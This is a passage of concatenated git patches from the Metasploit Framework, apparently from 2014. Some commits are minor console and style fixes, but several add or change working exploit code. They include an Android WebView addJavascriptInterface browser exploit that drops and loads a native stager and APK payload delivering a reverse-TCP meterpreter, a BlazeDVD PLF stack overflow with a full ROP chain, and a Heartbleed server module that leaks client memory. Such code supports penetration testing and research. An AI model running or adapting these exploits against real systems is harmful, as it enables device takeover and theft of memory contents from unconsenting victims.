so we concat pids manually var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']); var ch, path = '/data/data/'; - while ((ch = p.getInputStream().read()) >= 0) { path += String.fromCharCode(ch); } + while ((ch = p.getInputStream().read()) > 0) { path += String.fromCharCode(ch); } var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so'; var stagePath = path + '/#{stagename}.apk'; var dexPath = path + '/#{stagename}.dex'; From 1c57c0092cb54a5c2b69810d3458f7a631643582 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Wed, 2 Apr 2014 23:27:11 -0400 Subject: [PATCH 093/853] Tab complete case insensitive module options too --- lib/msf/ui/console/command_dispatcher/core.rb | 14 ++++++++------ 1 file changed, 8 insertions(+), 6 deletions(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 9e42ec66fc..3baf4bbc11 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2035,7 +2035,7 @@ class Core unless str.blank? res = res.select { |term| term.upcase.start_with?(str.upcase) } - res = res.map { |term| str << term[str.length..-1] } + res = res.map { |term| str + term[str.length..-1] } end return res @@ -2735,6 +2735,8 @@ class Core # Is this option used by the active module? if (mod.options.include?(opt)) res.concat(option_values_dispatch(mod.options[opt], str, words)) + elsif (mod.options.include?(opt.upcase)) + res.concat(option_values_dispatch(mod.options[opt.upcase], str, words)) end # How about the selected payload? @@ -2779,8 +2781,8 @@ class Core when 'Msf::OptAddressRange' case str when /^file:(.*)/ - files = tab_complete_filenames($1,words) - res += files.map { |f| "file:" << f } if files + files = tab_complete_filenames($1, words) + res += files.map { |f| "file:" + f } if files when /\/$/ res << str+'32' res << str+'24' @@ -2813,7 +2815,7 @@ class Core end when 'Msf::OptPath' - files = tab_complete_filenames(str,words) + files = tab_complete_filenames(str, words) res += files if files when 'Msf::OptBool' @@ -2822,8 +2824,8 @@ class Core when 'Msf::OptString' if (str =~ /^file:(.*)/) - files = tab_complete_filenames($1,words) - res += files.map { |f| "file:" << f } if files + files = tab_complete_filenames($1, words) + res += files.map { |f| "file:" + f } if files end end From aecd13d31480ffac7a6b09ba2668fc7f0f03b4a0 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre Date: Thu, 3 Apr 2014 09:54:48 -0400 Subject: [PATCH 094/853] Tab complete the same case --- lib/msf/ui/console/command_dispatcher/core.rb | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/lib/msf/ui/console/command_dispatcher/core.rb b/lib/msf/ui/console/command_dispatcher/core.rb index 3baf4bbc11..dba1b109f5 100644 --- a/lib/msf/ui/console/command_dispatcher/core.rb +++ b/lib/msf/ui/console/command_dispatcher/core.rb @@ -2035,7 +2035,15 @@ class Core unless str.blank? res = res.select { |term| term.upcase.start_with?(str.upcase) } - res = res.map { |term| str + term[str.length..-1] } + res = res.map { |term| + if str == str.upcase + str + term[str.length..-1].upcase + elsif str == str.downcase + str + term[str.length..-1].downcase + else + str + term[str.length..-1] + end + } end return res From c035715a711f507b5895f429c60a3a6f7f88fc8c Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Sat, 5 Apr 2014 02:50:53 -0700 Subject: [PATCH 095/853] Update mybb_get_type_db.rb Changed the name of the variable _Version_server on _version_server according to the recommendation of jvazquez-r7 --- modules/auxiliary/gather/mybb_get_type_db.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index e20d863f2d..58d01b6d58 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -73,19 +73,19 @@ class Metasploit3 < Msf::Auxiliary end #Check Web-Server - _Version_server = res['Server'] - if _Version_server - _Version_server = " Server Version: #{_Version_server}".ljust(40) + _version_server = res['Server'] + if _version_server + _version_server = " Server Version: #{_Version_server}".ljust(40) else - _Version_server = " Server Version: unknown".ljust(40) + _version_server = " Server Version: unknown".ljust(40) end #Check forum MyBB if res.body.match("MYBB") - print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + print_good("Congratulations! This forum is MyBB :) "+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server) return Exploit::CheckCode::Detected else - print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_Version_server) + print_status("This forum is not guaranteed to be MyBB"+"HOST: "+datastore['RHOST'].ljust(15)+php_version+_version_server) return Exploit::CheckCode::Unknown end rescue RuntimeError => err From 5dbd124ef9440ae72923fb817d47184b8639c536 Mon Sep 17 00:00:00 2001 From: Karmanovskii Date: Sat, 5 Apr 2014 02:53:43 -0700 Subject: [PATCH 096/853] Update mybb_get_type_db.rb --- modules/auxiliary/gather/mybb_get_type_db.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/gather/mybb_get_type_db.rb b/modules/auxiliary/gather/mybb_get_type_db.rb index 58d01b6d58..ad1e413cab 100644 --- a/modules/auxiliary/gather/mybb_get_type_db.rb +++ b/modules/auxiliary/gather/mybb_get_type_db.rb @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary #Check Web-Server _version_server = res['Server'] if _version_server - _version_server = " Server Version: #{_Version_server}".ljust(40) + _version_server = " Server Version: #{_version_server}".ljust(40) else _version_server = " Server Version: unknown".ljust(40) end From 2e4c2b1637ae1f10e7ffe1f09e3d87db367221de Mon Sep 17 00:00:00 2001 From: joev Date: Mon, 7 Apr 2014 09:44:43 -0500 Subject: [PATCH 097/853] Disable Android 4.0, add arch detection. Android 4.0, it turns out, has a different echo builtin than the other androids. Until we can figure out how to drop a payload on a 4.0 shell, we cannot support it. Arch detection allows mips/x86/arm ndkstagers to work, unfortunately x86 ndkstager was not working, so it is disabled for now. --- data/js/detect/os.js | 13 +- .../browser/webview_addjavascriptinterface.rb | 186 ++++++++++++++---- 2 files changed, 154 insertions(+), 45 deletions(-) diff --git a/data/js/detect/os.js b/data/js/detect/os.js index 47250c2d32..9214b49118 100644 --- a/data/js/detect/os.js +++ b/data/js/detect/os.js @@ -20,6 +20,7 @@ arch_armle = "armle"; arch_x86 = "x86"; arch_x86_64 = "x86_64"; arch_ppc = "ppc"; +arch_mipsle = "mipsle"; window.os_detect = {}; @@ -184,9 +185,15 @@ window.os_detect.getVersion = function(){ } else if (platform.match(/arm/)) { // Android and maemo arch = arch_armle; - if (navigator.userAgent.match(/android/i)) { - os_flavor = 'Android'; - } + } else if (platform.match(/x86/)) { + arch = arch_x86; + } else if (platform.match(/mips/)) { + arch = arch_mipsle; + } + + + if (navigator.userAgent.match(/android/i)) { + os_flavor = 'Android'; } } else if (platform.match(/windows/)) { os_name = oses_windows; diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index ec69512a81..8794fa903a 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -7,28 +7,49 @@ require 'msf/core' class Metasploit3 < Msf::Exploit::Remote - include Msf::Exploit::Remote::HttpServer::HTML + include Msf::Exploit::Remote::BrowserExploitServer include Msf::Exploit::Remote::BrowserAutopwn - autopwn_info({ - :os_flavor => "Android", - :arch => ARCH_ARMLE, + # Since the NDK stager is used, arch detection must be performed + SUPPORTED_ARCHES = [ ARCH_ARMLE, ARCH_MIPSLE ] # todo: , ARCH_X86 ] + + # Most android devices are ARM + DEFAULT_ARCH = ARCH_ARMLE + + # Some of the default NDK build targets are named differently than + # msf's builtin constants. This mapping allows the ndkstager file + # to be looked up from the msf constant. + NDK_FILES = { + ARCH_ARMLE => 'armeabi', + ARCH_MIPSLE => 'mips' + } + + autopwn_info( + :os_flavor => 'Android', :javascript => true, :rank => ExcellentRanking, + + # The Android 4.0 shell is different than other versions of android + # in that the echo builtin does not allow the \x hex encoding syntax. + # Android 4.0 is still vulnerable to the Java reflection exploit, but + # until we find a way to drop and run the payload, we can't support + # it as a target. :vuln_test => %Q| - for (i in top) { - try { - top[i].getClass().forName('java.lang.Runtime'); - is_vuln = true; break; - } catch(e) {} + if (!navigator.userAgent.match(/Android 4\.0;/)) { + for (i in top) { + try { + top[i].getClass().forName('java.lang.Runtime'); + is_vuln = true; break; + } catch(e) {} + } } | - }) + ) def initialize(info = {}) super(update_info(info, - 'Name' => 'Android Browser and WebView addJavascriptInterface Code Execution', - 'Description' => %q{ + 'Name' => 'Android Browser and WebView addJavascriptInterface Code Execution', + 'Description' => %q{ This module exploits a privilege escalation issue in Android < 4.2's WebView component that arises when untrusted Javascript code is executed by a WebView that has one or more Interfaces added to it. The untrusted Javascript code can call into the Java Reflection @@ -46,72 +67,92 @@ class Metasploit3 < Msf::Exploit::Remote Note: Adding a .js to the URL will return plain javascript (no HTML markup). }, - 'License' => MSF_LICENSE, - 'Author' => [ + 'License' => MSF_LICENSE, + 'Author' => [ 'jduck', # original msf module 'joev' # static server ], - 'References' => [ + 'References' => [ ['URL', 'http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/'], ['URL', 'https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/'], ['URL', 'http://50.56.33.56/blog/?p=314'], ['URL', 'https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/'], ['URL', 'https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py'] ], - 'Platform' => 'android', - 'Arch' => ARCH_DALVIK, - 'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp', }, - 'Targets' => [ [ 'Automatic', {} ] ], - 'DisclosureDate' => 'Dec 21 2012', - 'DefaultTarget' => 0, + 'Platform' => 'android', + 'Arch' => ARCH_DALVIK, + 'DefaultOptions' => { 'PAYLOAD' => 'android/meterpreter/reverse_tcp' }, + 'Targets' => [ [ 'Automatic', {} ] ], + 'DisclosureDate' => 'Dec 21 2012', + 'DefaultTarget' => 0, 'BrowserRequirements' => { - :source => 'script', - :os_flavor => "Android", - :arch => ARCH_ARMLE + :source => 'script', + :os_flavor => 'Android' } )) end + # Hooked to prevent BrowserExploitServer from attempting to do JS detection + # on requests for the static javascript file def on_request_uri(cli, req) - if req.uri.end_with?('js') - print_status("Serving javascript") - send_response(cli, js, 'Content-type' => 'text/javascript') + if req.uri =~ /\.js/ + serve_static_js(cli, req) else - print_status("Serving exploit HTML") - send_response_html(cli, html) + super end end - def ndkstager(stagename) - localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', 'armeabi', 'libndkstager.so') + # The browser appears to be vulnerable, serve the exploit + def on_request_exploit(cli, req, browser) + arch = normalize_arch(browser[:arch]) + print_status "Serving #{arch} exploit..." + send_response_html(cli, html(arch)) + end + + # The NDK stager is used to launch a hidden APK + def ndkstager(stagename, arch) + localfile = File.join(Msf::Config::InstallRoot, 'data', 'android', 'libs', NDK_FILES[arch] || arch, 'libndkstager.so') data = File.read(localfile, :mode => 'rb') data.gsub!('PLOAD', stagename) end - def js + def js(arch) stagename = Rex::Text.rand_text_alpha(5) - %Q| + script = %Q| function exec(obj) { // ensure that the object contains a native interface try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; } // get the pid - var pid = obj.getClass().forName('android.os.Process').getMethod('myPid', null).invoke(null, null); + var pid = obj.getClass() + .forName('android.os.Process') + .getMethod('myPid', null) + .invoke(null, null); // get the runtime so we can exec - var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null); - var runtime = m.invoke(null, null); + var runtime = obj.getClass() + .forName('java.lang.Runtime') + .getMethod('getRuntime', null) + .invoke(null, null); + + // libraryData contains the bytes for a native shared object built via NDK + // which will load the "stage", which in this case is our android meterpreter stager. + // LibraryData is loaded via ajax later, because we have to access javascript in + // order to detect what arch we are running. + var libraryData = "#{Rex::Text.to_hex(ndkstager(stagename, arch), '\\\\x')}"; + + // the stageData is the JVM bytecode that is loaded by the NDK stager. It contains + // another stager which loads android meterpreter from the msf handler. var stageData = "#{Rex::Text.to_hex(payload.raw, '\\\\x')}"; - var libraryData = "#{Rex::Text.to_hex(ndkstager(stagename), '\\\\x')}"; // get the process name, which will give us our data path // $PPID does not seem to work on android 4.0, so we concat pids manually var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']); var ch, path = '/data/data/'; while ((ch = p.getInputStream().read()) > 0) { path += String.fromCharCode(ch); } + var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so'; var stagePath = path + '/#{stagename}.apk'; - var dexPath = path + '/#{stagename}.dex'; // build the library and chmod it runtime.exec(['/system/bin/sh', '-c', 'echo "'+libraryData+'" > '+libraryPath]).waitFor(); @@ -121,19 +162,80 @@ class Metasploit3 < Msf::Exploit::Remote runtime.exec(['/system/bin/sh', '-c', 'echo "'+stageData+'" > '+stagePath]).waitFor(); runtime.exec(['chmod', '700', stagePath]).waitFor(); + // load the library (this fails in x86, figure out why) runtime.load(libraryPath); + + // delete dropped files runtime.exec(['rm', stagePath]).waitFor(); runtime.exec(['rm', libraryPath]).waitFor(); - runtime.exec(['rm', dexPath]).waitFor(); return true; } - for (i in top) { if (exec(top[i]) === true) break; } + if (!navigator.userAgent.match(/Android 4\.0;/)) { + for (i in top) { if (exec(top[i]) === true) break; } + } + | + + # remove comments and empty lines + script.gsub(/\/\/.*$/, '').gsub(/^\s*$/, '') + end + + # Called when a client requests a .js route. + # This is handy for post-XSS. + def serve_static_js(cli, req) + arch = req.qstring['arch'] + response_opts = { 'Content-type' => 'text/javascript' } + + if arch.present? + print_status("Serving javascript for arch #{normalize_arch arch}") + send_response(cli, js(normalize_arch arch), response_opts) + else + print_status("Serving arch detection javascript") + send_response(cli, static_arch_detect_js, response_opts) + end + end + + # This is served to requests for the static .js file. + # Because we have to use javascript to detect arch, we have 3 different + # versions of the static .js file (x86/mips/arm) to choose from. This + # small snippet of js detects the arch and requests the correct file. + def static_arch_detect_js + %Q| + var arches = {}; + arches['#{ARCH_ARMLE}'] = /arm/i; + arches['#{ARCH_MIPSLE}'] = /mips/i; + arches['#{ARCH_X86}'] = /x86/i; + + var arch = null; + for (var name in arches) { + if (navigator.platform.toString().match(arches[name])) { + arch = name; + break; + } + } + + if (arch) { + // load the script with the correct arch + var script = document.createElement('script'); + script.setAttribute('src', '#{get_uri}/#{Rex::Text::rand_text_alpha(5)}.js?arch='+arch); + script.setAttribute('type', 'text/javascript'); + + // ensure body is parsed and we won't be in an uninitialized state + setTimeout(function(){ + var node = document.body \|\| document.head; + node.appendChild(script); + }, 100); + } | end - def html - "" + # @return [String] normalized client architecture + def normalize_arch(arch) + if SUPPORTED_ARCHES.include?(arch) then arch else DEFAULT_ARCH end + end + + def html(arch) + "" end end From 7b9b20a07ecf5258fe208f92665abfbc999619bd Mon Sep 17 00:00:00 2001 From: silascutler Date: Mon, 7 Apr 2014 14:30:52 -0400 Subject: [PATCH 098/853] Corrected Spaces Issues Removed extra spaces on line 23&24 --- modules/auxiliary/scanner/elasticsearch/es_enum.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/auxiliary/scanner/elasticsearch/es_enum.rb b/modules/auxiliary/scanner/elasticsearch/es_enum.rb index 0e8735fdc5..804cc8fcc9 100644 --- a/modules/auxiliary/scanner/elasticsearch/es_enum.rb +++ b/modules/auxiliary/scanner/elasticsearch/es_enum.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Auxiliary 'Silas Cutler ' ], 'License' => MSF_LICENSE - )) + )) register_options( [ From fc841331d280e0b8b187a259be3c7a4af0dcce7e Mon Sep 17 00:00:00 2001 From: Joe Vennix Date: Tue, 8 Apr 2014 17:58:31 -0500 Subject: [PATCH 099/853] Add a test on echo to check for hex support. * This is much nicer than checking version on userAgent, which is often changed when rendered in an embedded webview. --- .../browser/webview_addjavascriptinterface.rb | 53 ++++++++++++------- 1 file changed, 33 insertions(+), 20 deletions(-) diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb index 8794fa903a..671fe0e83d 100644 --- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb +++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb @@ -28,20 +28,12 @@ class Metasploit3 < Msf::Exploit::Remote :os_flavor => 'Android', :javascript => true, :rank => ExcellentRanking, - - # The Android 4.0 shell is different than other versions of android - # in that the echo builtin does not allow the \x hex encoding syntax. - # Android 4.0 is still vulnerable to the Java reflection exploit, but - # until we find a way to drop and run the payload, we can't support - # it as a target. :vuln_test => %Q| - if (!navigator.userAgent.match(/Android 4\.0;/)) { - for (i in top) { - try { - top[i].getClass().forName('java.lang.Runtime'); - is_vuln = true; break; - } catch(e) {} - } + for (i in top) { + try { + top[i].getClass().forName('java.lang.Runtime'); + is_vuln = true; break; + } catch(e) {} } | ) @@ -97,6 +89,8 @@ class Metasploit3 < Msf::Exploit::Remote def on_request_uri(cli, req) if req.uri =~ /\.js/ serve_static_js(cli, req) + elsif req.uri =~ /\.msg/ && req.body.to_s.length < 100 + print_warning "Received message: #{req.body}" else super end @@ -119,7 +113,17 @@ class Metasploit3 < Msf::Exploit::Remote def js(arch) stagename = Rex::Text.rand_text_alpha(5) script = %Q| - function exec(obj) { + function exec(runtime, cmdArr) { + var ch = 0; + var output = ''; + var process = runtime.exec(cmdArr); + var input = process.getInputStream(); + + while ((ch = input.read()) > 0) { output += String.fromCharCode(ch); } + return output; + } + + function attemptExploit(obj) { // ensure that the object contains a native interface try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; } @@ -135,6 +139,19 @@ class Metasploit3 < Msf::Exploit::Remote .getMethod('getRuntime', null) .invoke(null, null); + // now ensure we can write out a hex-encoded byte with the shell's echo builtin + var byte = exec(runtime, ['/system/bin/sh', '-c', 'echo "\\\\x66"']); + if (byte.indexOf("\\\\") > -1) { + // if youre havin byte problems + var xml = new XMLHttpRequest(); + // i feel bad for you son + xml.open('POST', '#{get_module_resource}.msg', false); + // i got \\x63 problems + xml.send("Unsupported shell echo builtin: exploit aborted."); + // but your shell aint one + return true; + } + // libraryData contains the bytes for a native shared object built via NDK // which will load the "stage", which in this case is our android meterpreter stager. // LibraryData is loaded via ajax later, because we have to access javascript in @@ -147,9 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote // get the process name, which will give us our data path // $PPID does not seem to work on android 4.0, so we concat pids manually - var p = runtime.exec(['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']); - var ch, path = '/data/data/'; - while ((ch = p.getInputStream().read()) > 0) { path += String.fromCharCode(ch); } + var path = '/data/data/' + exec(runtime, ['/system/bin/sh', '-c', 'cat /proc/'+pid.toString()+'/cmdline']); var libraryPath = path + '/lib#{Rex::Text.rand_text_alpha(8)}.so'; var stagePath = path + '/#{stagename}.apk'; @@ -172,9 +187,7 @@ class Metasploit3 < Msf::Exploit::Remote return true; } - if (!navigator.userAgent.match(/Android 4\.0;/)) { - for (i in top) { if (exec(top[i]) === true) break; } - } + for (i in top) { if (attemptExploit(top[i]) === true) break; } | # remove comments and empty lines From c99f6654e8b81f578cde49d9d4aac4ce44d8d17b Mon Sep 17 00:00:00 2001 From: Ken Smith Date: Fri, 11 Apr 2014 09:59:11 -0400 Subject: [PATCH 100/853] Added target 6.1 to module --- .../windows/fileformat/blazedvd_plf.rb | 96 +++++++++++++++---- 1 file changed, 77 insertions(+), 19 deletions(-) diff --git a/modules/exploits/windows/fileformat/blazedvd_plf.rb b/modules/exploits/windows/fileformat/blazedvd_plf.rb index 88a82bd8bc..665188f30f 100644 --- a/modules/exploits/windows/fileformat/blazedvd_plf.rb +++ b/modules/exploits/windows/fileformat/blazedvd_plf.rb @@ -12,36 +12,58 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'BlazeDVD 5.1 PLF Buffer Overflow', + 'Name' => 'BlazeDVD 6.1 PLF Buffer Overflow', 'Description' => %q{ - This module exploits a stack over flow in BlazeDVD 5.1. When + This module exploits a stack over flow in BlazeDVD 5.1 and 6.1. When the application is used to open a specially crafted plf file, a buffer is overwritten allowing for the execution of arbitrary code. }, 'License' => MSF_LICENSE, - 'Author' => [ 'MC' ], + 'Author' => + [ + 'MC', + 'Deepak Rathore', + 'Spencer McIntyre', + 'Ken Smith' + ], 'References' => [ [ 'CVE' , '2006-6199' ], - [ 'OSVDB', '30770'], + [ 'EDB', '32737' ], + [ 'OSVDB', '30770' ], [ 'BID', '35918' ], ], 'DefaultOptions' => { - 'EXITFUNC' => 'process', - 'DisablePayloadHandler' => 'true', + 'EXITFUNC' => 'process' }, 'Payload' => { 'Space' => 750, - 'BadChars' => "\x00", - 'EncoderType' => Msf::Encoder::Type::AlphanumUpper, - 'DisableNops' => 'True', + 'BadChars' => "\x00\x0a\x1a", + 'DisableNops' => true }, 'Platform' => 'win', 'Targets' => [ - [ 'BlazeDVD 5.1', { 'Ret' => 0x100101e7 } ], + [ 'BlazeDVD 6.1', + { + 'Payload' => + { + # Stackpivot => add esp,0xfffff254 + 'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" + } + } + ], + [ 'BlazeDVD 5.1', + { + 'Ret' => 0x100101e7, + 'Payload' => + { + 'EncoderType' => Msf::Encoder::Type::AlphanumUpper + } + } + ], ], 'Privileged' => false, 'DisclosureDate' => 'Aug 03 2009', @@ -49,22 +71,58 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']), + OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf']), ], self.class) end + def rop_chain + # rop chain generated with mona.py - www.corelan.be + case target.name + when 'BlazeDVD 6.1' + rop_gadgets = [ ] + # 0x6162e802 RETN (ROP NOP) [EPG.dll] + rop_gadgets.fill(0x6162e802, 0..7) + rop_gadgets += [ + 0x6411437d, # POP EAX # RETN [NetReg.dll] + 0x10011108, # ptr to &VirtualProtect() [IAT SkinScrollBar.Dll] + 0x6033d910, # MOV ESI,DWORD PTR DS:[EAX] # RETN [Configuration.dll] + 0x640402b3, # POP EBP # RETN [MediaPlayerCtrl.dll] + 0x60335935, # & PUSH ESP # RETN 0C [Configuration.dll] + 0x6032b8bb, # POP EAX # RETN [Configuration.dll] + 0xfffffcff, # Value to negate, will become 0x00000301 + 0x61627d9c, # NEG EAX # RETN [EPG.dll] + 0x61640124, # XCHG EAX,EBX # RETN [EPG.dll] + 0x6403bb48, # POP EAX # RETN [MediaPlayerCtrl.dll] + 0xffffffc0, # Value to negate, will become 0x00000040 + 0x6403a1b7, # NEG EAX # RETN [MediaPlayerCtrl.dll] + 0x64046c72, # XCHG EAX,EDX # RETN [MediaPlayerCtrl.dll] + 0x6403c973, # POP ECX # RETN [MediaPlayerCtrl.dll] + 0x1001514c, # &Writable location [SkinScrollBar.Dll] + 0x6403a94d, # POP EDI # RETN [MediaPlayerCtrl.dll] + 0x6162e802, # RETN (ROP NOP) [EPG.dll] + 0x64106f33, # POP EAX # RETN [NetReg.dll] + 0x90909090, # nop + 0x6031d582, # PUSHAD # RETN [Configuration.dll] + ] + end + return rop_gadgets.flatten.pack("V*") + end + def exploit - - plf = rand_text_alpha_upper(6024) - - plf[868,8] = Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2) + [target.ret].pack('V') - plf[876,12] = make_nops(12) - plf[888,payload.encoded.length] = payload.encoded + case target.name + when 'BlazeDVD 5.1' + plf = rand_text_alpha_upper(6024) + plf[868,8] = Rex::Arch::X86.jmp_short(6) + rand_text_alpha_upper(2) + [target.ret].pack('V') + plf[876,12] = make_nops(12) + plf[888,payload.encoded.length] = payload.encoded + when 'BlazeDVD 6.1' + plf = rand_text_alphanumeric(260) + plf << rop_chain + plf << payload.encoded + end print_status("Creating '#{datastore['FILENAME']}' file ...") - file_create(plf) - end end From b95fcb961027c13e4af961479687401b21670c54 Mon Sep 17 00:00:00 2001 From: Ramon de C Valle Date: Sat, 12 Apr 2014 04:21:35 -0300 Subject: [PATCH 101/853] Use the protocol version sent by the client Use the protocol version sent by the client. This should be the latest version supported by the client, which may also be the only acceptable. This makes this module work with SSLv3, TLSv1.0, TLSv1.1, and TLSv1.2 when NEGOTIATE_TLS is not enabled (see https://gist.github.com/rcvalle/10335282). --- .../server/openssl_heartbeat_client_memory.rb | 31 +++++++------------ 1 file changed, 12 insertions(+), 19 deletions(-) diff --git a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb index cc6a75cd86..574c24810f 100644 --- a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb +++ b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb @@ -16,7 +16,7 @@ class Metasploit3 < Msf::Auxiliary 'Description' => %q{ This module provides a fake SSL service that is intended to leak memory from client systems as they connect. This module is - hardcoded for TLS/1.1 using the AES-128-CBC-SHA1 cipher. + hardcoded for using the AES-128-CBC-SHA1 cipher. }, 'Author' => [ @@ -160,19 +160,12 @@ class Metasploit3 < Msf::Auxiliary print_status("#{@state[c][:name]} Processing Client Hello...") - # Ignore clients that do not support heartbeat requests - unless data.index("\x0F\x00\x01\x01") - print_status("#{@state[c][:name]} Client does not support heartbeats") - c.close - return - end - # Extract the client_random needed to compute the master key @state[c][:client_random] = data[11,32] @state[c][:received_hello] = true print_status("#{@state[c][:name]} Sending Server Hello...") - openssl_send_server_hello(c, data) + openssl_send_server_hello(c, data, message_version) return end @@ -203,7 +196,7 @@ class Metasploit3 < Msf::Auxiliary else # Send heartbeat requests if @state[c][:heartbeats].length < heartbeat_limit - openssl_send_heartbeat(c) + openssl_send_heartbeat(c, message_version) end # Process cleartext heartbeat replies @@ -244,7 +237,7 @@ class Metasploit3 < Msf::Auxiliary # Send heartbeat requests if @state[c][:heartbeats].length < heartbeat_limit - openssl_send_heartbeat(c) + openssl_send_heartbeat(c, message_version) end # Process heartbeat replies @@ -305,14 +298,14 @@ class Metasploit3 < Msf::Auxiliary end # Send an OpenSSL Server Hello response - def openssl_send_server_hello(c, hello) + def openssl_send_server_hello(c, hello, version) # Create the Server Hello response extensions = "\x00\x0f\x00\x01\x01" # Heartbeat server_hello_payload = - "\x03\x02" + # TLS Version 1.1 + [version].pack('n') + # Use the protocol version sent by the client. @state[c][:server_random] + # Random (Timestamp + Random Bytes) "\x00" + # Session ID "\x00\x2F" + # Cipher ID (TLS_RSA_WITH_AES_128_CBC_SHA) @@ -321,31 +314,31 @@ class Metasploit3 < Msf::Auxiliary server_hello = [0x02].pack("C") + [ server_hello_payload.length ].pack("N")[1,3] + server_hello_payload - msg1 = "\x16\x03\x02" + [server_hello.length].pack("n") + server_hello + msg1 = "\x16" + [version].pack('n') + [server_hello.length].pack("n") + server_hello c.put(msg1) # Skip the rest of TLS if we arent negotiating it unless negotiate_tls? # Send a heartbeat request to start the stream and return - openssl_send_heartbeat(c) + openssl_send_heartbeat(c, version) return end # Certificates certs_combined = generate_certificates pay2 = "\x0b" + [ certs_combined.length + 3 ].pack("N")[1, 3] + [ certs_combined.length ].pack("N")[1, 3] + certs_combined - msg2 = "\x16\x03\x02" + [pay2.length].pack("n") + pay2 + msg2 = "\x16" + [version].pack('n') + [pay2.length].pack("n") + pay2 c.put(msg2) # End of Server Hello pay3 = "\x0e\x00\x00\x00" - msg3 = "\x16\x03\x02" + [pay3.length].pack("n") + pay3 + msg3 = "\x16" + [version].pack('n') + [pay3.length].pack("n") + pay3 c.put(msg3) end # Send the heartbeat request that results in memory exposure - def openssl_send_heartbeat(c) - c.put "\x18\x03\x02\x00\x03\x01" + [heartbeat_read_size].pack("n") + def openssl_send_heartbeat(c, version) + c.put "\x18" + [version].pack('n') + "\x00\x03\x01" + [heartbeat_read_size].pack("n") end # Pack the certificates for use in the TLS reply From 039946e8d17f32dbe3a20a8e458f8c23546bceb2 Mon Sep 17 00:00:00 2001 From: Ramon de C Valle Date: Sat, 12 Apr 2014 05:05:14 -0300 Subject: [PATCH 102/853] Use the first cipher suite sent by the client If encrypted, use the TLS_RSA_WITH_AES_128_CBC_SHA; otherwise, use the first cipher suite sent by the client. This complements the last commit and makes this module work with SSLv3, TLSv1.0, TLSv1.1, and TLSv1.2 when NEGOTIATE_TLS is not enabled (see https://gist.github.com/rcvalle/10335282). --- .../server/openssl_heartbeat_client_memory.rb | 10 +++++++++- 1 file changed, 9 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb index 574c24810f..e57c9724c3 100644 --- a/modules/auxiliary/server/openssl_heartbeat_client_memory.rb +++ b/modules/auxiliary/server/openssl_heartbeat_client_memory.rb @@ -300,6 +300,14 @@ class Metasploit3 < Msf::Auxiliary # Send an OpenSSL Server Hello response def openssl_send_server_hello(c, hello, version) + # If encrypted, use the TLS_RSA_WITH_AES_128_CBC_SHA; otherwise, use the + # first cipher suite sent by the client. + if @state[c][:encrypted] + cipher = "\x00\x2F" + else + cipher = hello[46, 2] + end + # Create the Server Hello response extensions = "\x00\x0f\x00\x01\x01" # Heartbeat @@ -308,7 +316,7 @@ class Metasploit3 < Msf::Auxiliary [version].pack('n') + # Use the protocol version sent by the client. @state[c][:server_random] + # Random (Timestamp + Random Bytes) 